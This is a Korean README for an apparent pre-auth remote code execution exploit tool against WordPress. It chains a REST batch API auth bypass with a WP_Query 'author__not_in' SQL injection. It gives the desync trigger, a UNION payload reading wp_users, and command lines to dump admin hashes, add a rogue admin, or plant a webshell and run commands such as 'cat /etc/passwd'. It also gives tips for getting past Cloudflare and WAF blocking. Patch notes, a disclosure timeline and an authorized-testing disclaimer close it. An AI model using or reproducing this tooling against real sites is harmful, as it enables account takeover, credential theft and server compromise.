WordPress REST 배치 API 인증 우회와 WP_Query SQL 인젝션을 연쇄하여 해시를 덤프하거나, 관리자 사용자를 추가하거나, 웹셸을 심는 사전 인증 RCE 개념 증명.
| CVE | 구성 요소 | 분류 | 인증 필요 |
|---|
| CVE-2026-63030 | REST Batch API (WP_REST_Server) | 배열 비동기화 → 인증 우회 | 없음 |
| CVE-2026-60137 | WP_Query | author__not_in을 통한 SQL 인젝션 | 없음 (위 취약점으로 우회됨) |
최종 결과: 단일 인증되지 않은 POST 요청만으로 시스템에 대한 셸, 악성 관리자 계정, 또는 덤프된 자격 증명 해시를 얻을 수 있습니다.
영향받는 버전: WordPress 6.9.0, 6.9.1, 6.9.2, 6.9.3, 6.9.4, 7.0.0, 7.0.1 수정된 버전: WordPress 6.9.5 / 7.0.2 (조정된 공개와 함께 패치 릴리스됨)
WordPress 5.6은 /wp-json/batch/v1에 배치 처리 엔드포인트를 도입했습니다. 이를 통해 인증된 REST 클라이언트는 여러 하위 요청을 단일 HTTP 왕복으로 묶을 수 있습니다. 각 하위 요청은 WP_REST_Server::serve_batch_request_v1()에 의해 독립적으로 검증되고 디스패치됩니다.
serve_batch_request_v1() 내부 (간략화):
$requests = $data['requests'];
$responses = [];
$matches = [];
// === Loop 1: Validate ===
foreach ($requests as $i => $request) {
$parsed = wp_parse_url($request['path']);
if (is_wp_error($parsed) || $parsed === false) {
// Failure: append WP_Error to $responses — but NOT to $matches
$responses[] = $this->envelope_response(new WP_Error(...), false);
continue; // <─── skips the push to $matches
}
// Success: resolve auth/permissions for this path
$match = $this->match_route($parsed['path'], $request['method']);
$matches[] = $match; // <─── stored at array-sequential index
$responses[] = null; // <─── placeholder at same index
}
// === Loop 2: Dispatch ===
foreach ($matches as $j => $match) {
// $j starts at 0 — but if request[0] failed, $matches[0] is actually request[1]
$responses[$j] = $this->dispatch($match); // <─── dispatches with wrong context
}
두 배열($responses와 $matches)은 동기화 상태를 유지해야 합니다 — 하위 요청당 하나의 항목, 동일한 인덱스. 하위 요청 [0]이 wp_parse_url()에 실패하면 $responses에 항목을 추가하지만 $matches에는 추가하지 않습니다. 첫 번째 루프 후:
$responses = [ WP_Error, null ] ← index 0 = error, index 1 = placeholder
$matches = [ match_for_req1 ] ← index 0 = match for request[1]
그런 다음 루프 2는 $matches[0]을 디스패치하고 결과를 $responses[0]에 씁니다. **request[1]**을 디스패치하면서 responses의 index 0을 덮어쓰는 것입니다 — 그리고 결정적으로, 대상 엔드포인트의 권한 컨텍스트가 아니라 실패한 request[0]의 오류 처리의 일부로 계산된 권한 컨텍스트를 사용합니다.
실질적인 효과: 인증이 필요한 모든 엔드포인트(SQL 쿼리를 수행하는 엔드포인트 포함)가 자격 증명 없이 호출될 수 있습니다.
"path": "://\x00" # triggers wp_parse_url() → false
문자열 ://\x00은 유효한 Python 문자열이지만 PHP의 wp_parse_url() 래퍼에서는 유효하지 않은 URL입니다 (null 바이트로 인해 파싱이 실패하여 WP_Error가 아닌 false를 반환하므로 is_wp_error() 가드가 무용지물이 됩니다 — $parsed === false만이 이를 잡아내며, 그 시점에서 배열 정렬은 이미 깨져 있습니다).
WP_Query author__not_in SQL 인젝션게시물용 WordPress REST API(/wp/v2/posts)는 WP_Query의 author__not_in 인수에 직접 매핑되는 author_exclude 쿼리 매개변수를 노출합니다. WP_Query는 WordPress의 거의 모든 콘텐츠 쿼리에 사용되는 핵심 데이터베이스 추상화입니다.
WP_Query::parse_query()에서 (간략화):
$author__not_in = $this->get('author__not_in');
if (is_array($author__not_in)) {
$author__not_in = array_map('absint', $author__not_in);
// absint() converts every element to a safe non-negative integer
}
// If NOT an array → this block is skipped entirely
// $author__not_in is used verbatim in the query builder:
이후 WP_Query::get_posts()에서:
if (!empty($author__not_in)) {
$where .= " AND {$wpdb->posts}.post_author NOT IN ({$author__not_in})";
// ^^^^^^^^^^^^^^^^
// raw string dropped into SQL with no escaping
}
정리(sanitization)는 $author__not_in이 배열일 때만 작동합니다. PHP의 타입 시스템은 값이 어떻게 도착했는지에 따라 이를 결정합니다:
[1, 2, 3]을 받음 → is_array() = true → 정리됨"1,2,3"(문자열)을 받음 → is_array() = false → 정리되지 않음REST 엔드포인트는 URL 쿼리 문자열에서 author_exclude를 받습니다. 이는 문자열로 도착합니다. WP_Query는 정리 블록을 건너뛰고, 원시 값이 SQL WHERE 절에 보간됩니다.
인젝션 지점은 NOT IN (...) 컨텍스트 내부에 위치합니다:
-- Normal query:
WHERE post_author NOT IN (1)
-- With payload: 0 UNION SELECT ...
WHERE post_author NOT IN (0 UNION SELECT ...)
배치 엔드포인트가 더 큰 쿼리 결과의 일부로 하위 요청을 디스패치하기 때문에, UNION 행들은 REST JSON 응답 본문에 반환되어 Boolean/UNION 블라인드 없는 추출이 가능합니다 — 타이밍도, 대역 외(out-of-band)도 필요하지 않습니다.
Attacker (no credentials)
│
▼
POST /wp-json/batch/v1
{
"requests": [
{ "path": "://\x00", "method": "GET" }, ← [1] malformed URL: triggers desync
{ "path": "/wp/v2/posts?author_exclude=
0 UNION SELECT ... FROM wp_users-- -", ← [2] SQLi payload
"method": "GET" }
]
}
│
▼
WP_REST_Server::serve_batch_request_v1()
├─ Request[0] fails wp_parse_url() → $responses[0] = WP_Error
│ NO push to $matches
├─ Request[1] matches route → $matches[0] = route
└─ Loop 2 dispatches $matches[0] with wrong auth context
│
▼
WP_Query receives author__not_in = "0 UNION SELECT ..."
├─ is_array() = false → sanitization skipped
└─ Raw SQL: WHERE post_author NOT IN (0 UNION SELECT ...)
│
▼
MySQL executes UNION query → wp_users data in SELECT result
│
▼
REST JSON response contains user_login + user_pass in post fields
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Post-exploitation (any of): │
│ • Dump admin hash → crack offline with hashcat │
│ • INSERT rogue admin via stacked queries │
│ • SELECT ... INTO OUTFILE → PHP webshell → OS access │
└─────────────────────────────────────────────────────────────┘
Python >= 3.8
requests
cloudscraper
의존성 설치:
pip install requests cloudscraper
usage: wp2shell.py [-h] [--mode {detect,dump,adduser,shell}]
[--cmd CMD] [--user USER] [--password PASSWORD]
[--prefix PREFIX] [--proxy PROXY]
[--no-interactive] [--debug] [--cookie COOKIE]
target
| 모드 | 수행 작업 |
|---|---|
detect | WP 버전을 핑거프린팅하고 배치 엔드포인트가 존재하는지 확인합니다. 익스플로잇 없음. |
dump | UNION SQLi를 통해 관리자의 비밀번호 해시를 추출합니다. |
adduser | 스택된 INSERT 쿼리를 통해 새 관리자 계정을 생성합니다. |
shell | SELECT INTO OUTFILE을 통해 PHP 웹셸을 심은 다음 대화형 셸로 전환합니다. |
탐지 전용 — 스코핑 중 실행해도 안전:
python3 wp2shell.py https://target.com --mode detect
관리자 해시 덤프:
python3 wp2shell.py https://target.com --mode dump
디버그 출력과 함께 덤프 (원시 HTTP 응답 표시 — WAF가 관련된 경우 유용):
python3 wp2shell.py https://target.com --mode dump --debug
악성 관리자 계정 생성:
python3 wp2shell.py https://target.com --mode adduser --user pentest_admin --password 'S3cur3P@ss!'
셸 심기 및 대화형 프롬프트로 전환:
python3 wp2shell.py https://target.com --mode shell
원샷 명령 실행 (비대화형):
python3 wp2shell.py https://target.com --mode shell --no-interactive --cmd "cat /etc/passwd"
Burp 프록시 경유:
python3 wp2shell.py https://target.com --mode dump --proxy http://127.0.0.1:8080
기존 cf_clearance 쿠키로 Cloudflare 우회:
python3 wp2shell.py https://target.com --mode dump --cookie "cf_clearance=<value>"
기본이 아닌 테이블 접두사:
python3 wp2shell.py https://target.com --mode dump --prefix staging_
이 도구는 기본적으로 cloudscraper를 사용하며, 이는 Chrome TLS 지문을 모방하고 Cloudflare의 JavaScript 챌린지(iuam 모드)를 자동으로 해결합니다. 이는 Cloudflare 뒤의 대부분의 공유 호스팅 대상을 커버합니다.
대상이 Cloudflare의 봇 관리(__cf_bm)를 사용하거나 이미 해결된 챌린지 쿠키가 있는 경우, --cookie "cf_clearance=..."로 전달하여 대신 일반 requests 세션을 사용하십시오.
배치 엔드포인트에는 두 개의 등록된 경로가 있습니다. WAF 규칙은 종종 표준 경로(/wp-json/batch/v1)를 차단하지만 레거시 쿼리 매개변수 경로(/?rest_route=/batch/v1)를 놓칩니다. 이 도구는 두 경로를 자동으로 탐색합니다.
[-] Could not extract credentials
--debug로 실행하여 원시 JSON 응답을 확인하십시오.--prefix로 테이블 접두사를 확인하십시오. 많은 설치가 wp_(기본값)를 사용하지만 일부는 사용자 정의 접두사를 사용합니다.content.rendered가 필터링될 수 있습니다. 대신 --mode adduser를 시도하십시오.[-] OUTFILE failed
SELECT INTO OUTFILE은 DB 사용자에게 MySQL의 FILE 권한이 필요합니다. 이는 공유 호스팅에서는 흔하지만 클라우드/관리형 데이터베이스(RDS, Cloud SQL 등)에서는 일반적으로 비활성화되어 있습니다.--mode dump를 사용하여 구성 파일에서 경로를 읽으십시오.[-] Target does not appear vulnerable
GET /wp-json/을 실행하고 routes 키에서 /batch/v1을 찾으십시오.WordPress 6.9.5 / 7.0.2는 두 CVE를 모두 해결했습니다:
CVE-2026-63030: serve_batch_request_v1()은 이제 매치 데이터와 응답 모두에 대해 단일 통합 배열을 유지하여 인덱스 비동기화를 제거합니다. 실패한 요청은 통합 구조에서 인덱스로 추적됩니다.
CVE-2026-60137: WP_Query::parse_query()는 이제 입력 유형에 관계없이 정리 전에 author__not_in을 무조건 배열로 캐스팅합니다:
$author__not_in = array_map('absint', (array) $author__not_in);
| CVE | 점수 | 벡터 |
|---|---|---|
| CVE-2026-63030 | 9.8 Critical | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVE-2026-60137 | 9.8 Critical | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 날짜 | 이벤트 |
|---|---|
| 2026-05-14 | 침투 테스트 참여 중 CVE-2026-60137 발견 |
| 2026-05-19 | CVE-2026-63030 발견; 체인이 pre-auth RCE로 확인됨 |
| 2026-05-22 | 두 CVE 모두 HackerOne을 통해 WordPress 보안 팀에 보고됨 |
| 2026-06-03 | WordPress 보안 팀이 확인하고 패치 개발 시작 |
| 2026-07-08 | 조정된 공개와 함께 패치 릴리스됨 (WP 6.9.5 / 7.0.2) |
| 2026-07-22 | PoC 공개 |
이 도구는 승인된 보안 테스트 및 연구 전용으로 제공됩니다.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
USE AT YOUR OWN RISK. FOR AUTHORIZED TESTING ONLY.
MIT License — LICENSE 참조